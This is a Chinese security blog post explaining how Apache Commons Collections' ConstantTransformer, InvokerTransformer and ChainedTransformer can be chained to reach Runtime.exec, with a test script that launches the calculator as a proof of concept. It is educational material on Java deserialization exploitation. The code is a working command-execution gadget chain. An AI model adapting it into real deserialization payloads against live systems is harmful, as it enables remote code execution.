Java反序列化恶意代码执行方法(一)

前言

本文是对Java反序列化利用链的补充,这里记录了利用Transformer类进行恶意代码执行的过程和其中一些重要的代码,利于更好地学习Java反序列化利用的知识。

命令执行

Transformer类

ConstantTransformer

对类的java.lang.Class类进行保存

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
public class ConstantTransformer<I, O> implements Transformer<I, O>, Serializable {
		private final O iConstant;
		/*
		省略部分代码
		*/

    public ConstantTransformer(O constantToReturn) {
        this.iConstant = constantToReturn;
    }

    public O transform(I input) {
        return this.iConstant;
    }

    public O getConstant() {
        return this.iConstant;
    }
}

InvokerTransformer

对类的方法进行反射调用,利用transform函数调用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

// 函数名
private final String iMethodName;
// 函数的参数类型,new Class[]{String.class,...,Class.class}
private final Class<?>[] iParamTypes;
// 函数的参数值,new Object[]{"test",...,obj}
private final Object[] iArgs;

// 构造函数
public InvokerTransformer(String methodName, Class<?>[] paramTypes, Object[] args) {
    this.iMethodName = methodName;
    this.iParamTypes = paramTypes != null ? (Class[])paramTypes.clone() : null;
    this.iArgs = args != null ? (Object[])args.clone() : null;
}

// 解析调用函数
public O transform(Object input) {
    if (input == null) {
        return null;
    } else {
        try {
            Class<?> cls = input.getClass();
            Method method = cls.getMethod(this.iMethodName, this.iParamTypes);
            return method.invoke(input, this.iArgs);
        } catch (NoSuchMethodException var4) {
            throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' does not exist");
        } catch (IllegalAccessException var5) {
            throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' cannot be accessed");
        } catch (InvocationTargetException var6) {
            throw new FunctorException("InvokerTransformer: The method '" + this.iMethodName + "' on '" + input.getClass() + "' threw an exception", var6);
        }
    }
}

ChainedTransformer

对队列里的所有Transformer调用transform函数,并将结果都保存在object变量中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
private final Transformer<? super T, ? extends T>[] iTransformers;

// 构造函数
public ChainedTransformer(Transformer<? super T, ? extends T>... transformers) {
    this(true, transformers);
}

public T transform(T object) {
    Transformer[] arr$ = this.iTransformers;
    int len$ = arr$.length;

    for(int i$ = 0; i$ < len$; ++i$) {
        Transformer<? super T, ? extends T> iTransformer = arr$[i$];
        object = iTransformer.transform(object);
    }

    return object;
}

测试脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.*;
import java.lang.reflect.InvocationTargetException;

public class CommonsCollections implements Serializable {
    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, IOException, InstantiationException {
        // ConstantTransformer使用
        ConstantTransformer constantTransformer = new ConstantTransformer(Runtime.getRuntime());
        Object o = constantTransformer.transform(new Object());
        System.out.println(Runtime.getRuntime().getClass().getName());
        System.out.println(o.getClass().getName());

        // InvokerTransformer使用
        InvokerTransformer invokerTransformer = new InvokerTransformer("exec",
                new Class[]{String.class},
                new String[]{"open -a Calculator"}
        );
        invokerTransformer.transform(Runtime.getRuntime());

        // 原始恶意语句
        InvokerTransformer invokerTransformer1 = new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open -a Calculator"});
        Object obj = Class.forName("java.lang.Runtime").getMethod("getRuntime").invoke(Class.forName("java.lang.Runtime"));
        invokerTransformer1.transform(obj);
        

        // 恶意语句利用
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class,Class[].class},
                        new Object[]{"getRuntime", new Class[0]}
                ),
                new InvokerTransformer("invoke",
                        new Class[] {Object.class, Object[].class},
                        new Object[] {null, new Object[0]}
                ),
                new InvokerTransformer("exec",new Class[]{String.class}, new Object[]{"open -a Calculator"})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        
        // 触发点
        chainedTransformer.transform(new Object());
        

    }
}
#Java安全
Java反序列化恶意代码执行方法(一)
http://blog.lousix.top/2023/03/02/Java反序列化恶意代码执行方法(一)/
作者
Lousix
发布于
2023年3月2日
许可协议